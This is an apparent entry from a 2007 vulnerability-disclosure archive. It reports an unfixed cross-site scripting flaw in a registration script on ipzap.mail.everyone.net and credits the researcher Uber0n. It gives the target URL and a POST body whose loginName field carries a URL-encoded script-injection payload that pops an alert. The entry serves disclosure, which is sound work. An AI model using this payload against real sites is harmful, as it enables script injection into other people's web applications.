Security researcher Uber0n, has submitted on 02/10/2007 a cross-site-scripting (XSS) vulnerability affecting ipzap.mail.everyone.net, which at the time of submission ranked 4630 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 05/10/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 02/10/2007 |
Date published: 05/10/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: Uber0n |
Domain: ipzap.mail.everyone.net |
Category: XSS |
Pagerank: 4630 |
URL: http://ipzap.mail.everyone.net/email/scripts/collectRegistrationInfo.pl |
POST: saveData=1&edit=0&loginName=%22%27%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&password=&passwordCon firm=&passwordQuestion=&passwordAnswer=&firstName=&lastName=&streetAddress=&city=&state=®ion=&pos talCode=&country=&altEmailAddress=&phoneNumber=&birthMonth=&birthDay=&birthYear=&gender=&primaryLang =&householdIncome=&occupation=&industry=&humanTest=&robotfile=10738545 |
Click here to view the mirror
|
|
|